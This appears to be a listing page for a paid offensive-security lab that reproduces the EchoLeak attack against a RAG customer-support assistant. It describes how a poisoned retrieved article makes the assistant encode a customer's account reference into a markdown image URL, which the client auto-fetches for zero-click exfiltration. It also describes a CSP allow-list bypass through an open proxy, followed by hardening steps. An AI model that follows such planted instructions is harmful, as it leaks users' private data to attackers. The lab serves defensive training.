Insecure Output Handling: Zero-Click Exfiltration Through Rendered Model Output (EchoLeak)

Hosted · ide

Beta

Insecure Output Handling: Zero-Click Exfiltration Through Rendered Model Output (EchoLeak)

Treat the model as an untrusted source whose output flows into a sink: the chat client's markdown renderer. Prove the renderer auto-fetches, plant a document so a benign account question makes the assistant echo a customer's own account reference into a markdown image URL, and watch the renderer auto-fetch it (zero-click exfil, the EchoLeak channel). Measure its attack-success-rate, defeat a CSP-style allow-list through a first-party open proxy, measure that bypass too, then harden in two moves: close the render sink so untrusted output never fires an outbound request, add an audited host allow-list the open proxy cannot defeat, and re-run both attacks to watch ASR fall to zero.

85 min8 steps3 domainsAdvanced

Hands-on labs require Pro · $29.99/mo · cancel anytime

Map the attack surface

Query

Retriever

LLM

Poisoned doc

retrieved chunk

Answer

0%

Attack-success rate

Attacks blocked · benign answers pass

graded on real output, not the model's talk

What you'll learn

1
Recon: prove the renderer auto-fetches
You are red-teaming DV-RAG-Support, ACME Cloud's customer-support assistant. A
2
Pixel exfil: zero-click leak through the renderer
Now turn the renderer into an exfil channel. The model is never asked to leak a
3
Measure: attack-success-rate of the pixel exfil
One lucky exfil is a demo. A finding needs an attack-success-rate (ASR): how often
4
CSP bypass: defeat the allow-list through a first-party open proxy
The blue team shipped a CSP-style fix: the renderer now trusts exactly one image
5
Measure: attack-success-rate of the CSP bypass
You proved the open-proxy bypass works once. A finding needs the same treatment the
6
Harden the sink: no outbound on untrusted output
Switch hats. You proved the direct-pixel exfil, measured it, bypassed a CSP-style
7
Harden the allow-list: an audited host list the open proxy cannot defeat
The sink no longer fetches attacker query params, so both exploits are dead today. But
8
Verify: re-run both attacks, ASR drops to zero
A fix you did not re-measure is a hope. You measured two attacks earlier: the

Prerequisites

Comfortable reading Python
Know what an HTTP GET and a markdown image are
No ML background required

Exam domains covered

Offensive AI SecurityLLM Application SecurityData Exfiltration

Skills & technologies you'll practice

This advanced-level ai/ml lab gives you real-world reps across:

Insecure Output HandlingEchoLeakData ExfiltrationRAGMarkdown RenderingOWASP LLM05Offensive SecurityAI Red Team

What you'll do in this lab

This is a hands-on offensive-security lab about insecure output handling (OWASP LLM05). You attack DV-RAG-Support, a working Retrieval-Augmented Generation assistant, by treating its output as somebody else's input. The chat client renders the model's answer as markdown, and a markdown image is an outbound HTTP request. You plant one help article so that a customer's ordinary account question makes the assistant echo the customer's own account reference into an image URL, and the renderer auto-fetches it. The record exfiltrates with zero clicks, the same channel behind EchoLeak, the first real-world zero-click exploit against a production LLM system.

You then defeat a CSP-style allow-list the way EchoLeak's authors did: by routing the exfil through a first-party open proxy that the allow-list trusts, proving an allow-list is only as strong as its most open member. You measure how reliably the channel fires across realistic account questions, then switch hats and close the sink on the sink side: an audited egress allow-list that refuses open-proxy members, a renderer that never forwards attacker query parameters, and a safe-markdown subset that drops raw HTML and dangerous URI schemes. The lesson is that the bug was never that the model said something bad; it was that the app passed model output to an interpreter unsanitized.

Frequently asked questions

Do I need to know machine learning to do this lab?

No. You need to read Python and understand a basic HTTP request and a markdown image. The lab is about how an application trusts and renders model output, not about model internals. Everything model-specific is explained inline.

What is insecure output handling?

It is the class of bug where an application passes model output to an interpreter (a browser, a shell, a SQL engine, an HTTP client) without sanitizing it. Here the interpreter is the chat client's markdown renderer, and a model-emitted image URL becomes an attacker-controlled outbound request. It is OWASP LLM05:2025, Improper Output Handling.

Is this how the EchoLeak Copilot attack worked?

Yes, in miniature. EchoLeak (CVE-2025-32711, CVSS 9.3) made Microsoft 365 Copilot encode a user's own data into a markdown image URL that the client auto-loaded, exfiltrating the data with no user interaction, and its CSP allow-list was bypassed through a first-party open proxy. This lab reproduces that render-sink channel and that allow-list bypass against a small RAG assistant you can read end to end.